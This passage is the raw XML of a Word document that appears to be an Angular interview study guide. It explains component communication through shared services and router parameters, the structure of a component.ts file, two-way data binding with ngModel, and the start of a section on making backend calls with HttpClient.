        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05942CA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Message() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2082826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messageEvent.emit('Hello from child');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D15A9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8C72D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4A1FBB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messageEvent)="receiveMessage($event)"&gt;&lt;/app-child&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E583DF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Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4CF3F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ceiveMessage($event: string) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5537DAB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eceivedMessage = $event;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACD86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A33551"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0A621">
          <v:rect id="_x0000_i3748" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25411A87"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Sibling Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA366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a </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>shared service</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with Subject or BehaviorSubject for communication between sibling components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108F566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hared Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F3223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 providedIn: 'root' })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7435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429DF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dataSource = new BehaviorSubject&lt;string&gt;('default');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0573533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urrentData = this.dataSource.asObservable();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344C10AA" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1E" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65281FA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hangeData(data: string) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F521D1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ource.next(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3388C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13DA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4BF570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A (Sender):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7B6B9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18DC17A9" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1E" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E8463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Data() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E88EE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ervice.changeData('Hello from A');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC0521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1B4D4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B (Receiver):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427134E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0C064E2B" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1E" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68F184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Init() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14738F9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this.dataService.currentData.subscribe(data =&gt; this.receivedData = data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30585C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8EE546F"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21628">
          <v:rect id="_x0000_i3749" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2A063B"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Using Router Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393DF27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passing data during navigation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188B3112"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Navigate with Data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE64CB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r.navigate(['/details', id]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5419E5C4"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ccess in Component:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00906F8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params.subscribe(params =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4012D0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id = params['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCB208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4D1A88" w14:textId="29DC5931"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750" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33414009" w14:textId="0C1DC9AA" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="00B91568">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="921" w:name="_Toc197868135"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What does the component.ts file contain in angular</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="921"/>
    </w:p>
    <w:p w14:paraId="1389CB0F" w14:textId="39811154" w:rsidR="00FD3000" w:rsidRPr="003C7C02" w:rsidRDefault="00FD3000"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component.ts file in Angular defines the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>logic and behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a component. It’s the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file that contains metadata, properties, methods, and lifecycle hooks for the component.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283FC735"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745151">
          <v:rect id="_x0000_i3751" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C9FE0B"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ical Structure of a component.ts file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D23B1E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4D6CD6D0" w14:textId="77777777" w:rsidR="00FD3000" w:rsidRPr="003C7C02" w:rsidRDefault="00FD3000" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6379D8F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485F2D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xample',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C2244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xample.component.html',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF5BF0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example.component.css']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AD911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A2C47D"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xampleComponent implements OnInit {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6158D9A8" w14:textId="77777777" w:rsidR="00FD3000" w:rsidRPr="003C7C02" w:rsidRDefault="00FD3000" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28A2F19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perties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1B662F"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string = 'My Angular Component';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2BC64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unt: number = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466199C2" w14:textId="77777777" w:rsidR="00FD3000" w:rsidRPr="003C7C02" w:rsidRDefault="00FD3000" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="295481C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nstructor (used for dependency injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A031153"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 {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BC5DD1" w14:textId="77777777" w:rsidR="00FD3000" w:rsidRPr="003C7C02" w:rsidRDefault="00FD3000" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F67EB67"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Lifecycle Hook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BE850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void {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5802BA6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mponent initialized');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB6FA1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5A4D597" w14:textId="77777777" w:rsidR="00FD3000" w:rsidRPr="003C7C02" w:rsidRDefault="00FD3000" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FA2D3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Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74911BD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crementCount() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE521E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ount++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A517F7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392EFA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7001509"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06180">
          <v:rect id="_x0000_i3752" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1933C56D"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877"/>
      </w:tblGrid>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="6E8CD87A" w14:textId="77777777" w:rsidTr="00FD3000">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7229A130"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art</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4219B04A"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082EB0EA" w14:textId="77777777" w:rsidTr="00FD3000">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C59B91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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="091F132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that marks the class as a component and provides metadata like selector, template, and style.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="375DB953" w14:textId="77777777" w:rsidTr="00FD3000">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0245AA26"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lector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="459D1C9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custom HTML tag used to render the component.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="08080726" w14:textId="77777777" w:rsidTr="00FD3000">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="219B7D0C"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mplateUrl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6518EB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 to the HTML file (view) associated with the component.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="1FD44297" w14:textId="77777777" w:rsidTr="00FD3000">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3707014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yleUrls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22C94E7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s) to the CSS file(s) for styling.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="32DA9B6D" w14:textId="77777777" w:rsidTr="00FD3000">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D0B4B0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lass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="254A6A3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the component's business logic, variables, and methods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="3F8C65D0" w14:textId="77777777" w:rsidTr="00FD3000">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0789625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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C8E70D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dependency injection (services, etc.).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="22D440C7" w14:textId="77777777" w:rsidTr="00FD3000">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="082AB7C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ngOnInit()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69D81CC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ifecycle hook that runs when the component is initialized.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49DC2216" w14:textId="55D507F6"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753" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D172AD" w14:textId="182886C8" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="000B552F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="922" w:name="_Toc197868136"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain </w:t>
      </w:r>
      <w:r w:rsidR="00C25623" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>two-way</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> data binding in angular</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="922"/>
    </w:p>
    <w:p w14:paraId="65D90279" w14:textId="5A4A2677" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373A"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wo-Way Data Binding in Angular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5140D2D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wo-way data binding</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows synchronization of data between the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>component class</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template (view)</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. If data in the component changes, the view updates automatically, and vice versa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE6729A"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3C4544">
          <v:rect id="_x0000_i3754" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C763A0"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145B74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provides two-way data binding using the special syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A94396A"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el)] = "property"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336B7A9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is is called the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>banana in a box</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> syntax – combining:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D49C51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property binding (component → view)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521B21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event binding (view → component)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D98347"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39F9FA">
          <v:rect id="_x0000_i3755" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="348E21BF"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4BB1660A"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6FA47CA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144FDA0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string = 'Siddhant';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566C2F0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F545238"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30E2F6C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input [(ngModel)]="name" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E22E2C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Hello, {{ name }}!&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B61B624"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you type in the input box, name in the component gets updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E956D7B"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name is updated in the component, it reflects in the input and &lt;p&gt; tag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6595B876"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7AF1B">
          <v:rect id="_x0000_i3756" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD26A39"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rerequisite:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1241E10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use [(ngModel)], you must import FormsModule:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0461A41B"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module.ts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E150E3"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FormsModule } from '@angular/forms';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE8ED54" w14:textId="77777777" w:rsidR="00A6373A" w:rsidRPr="003C7C02" w:rsidRDefault="00A6373A" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58E599B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B45DD8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FormsModule],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4250C07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F54EA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3D755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4B1FF25A" w14:textId="13DE7CB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757" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AADCB3" w14:textId="6575BDC9" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="00A976FD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="923" w:name="_Toc197868137"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to make backend calls in angular</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="923"/>
    </w:p>
    <w:p w14:paraId="50EE6F28" w14:textId="2D5459BC" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E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king Backend Calls in Angular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662B244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make HTTP calls from an Angular frontend to a backend API (e.g., Spring Boot), Angular provides the HttpClient service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201A9979"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8E40E">
          <v:rect id="_x0000_i3758" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="377E71DA"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Make Backend Calls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E2893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Import HttpClientModule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B6043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dd this in your app.module.ts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CC0BD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Module } from '@angular/common/http';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EF25ED" w14:textId="77777777" w:rsidR="00E72E77" w:rsidRPr="003C7C02" w:rsidRDefault="00E72E77" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="198EC1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149D5645"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HttpClientModule]</w:t>
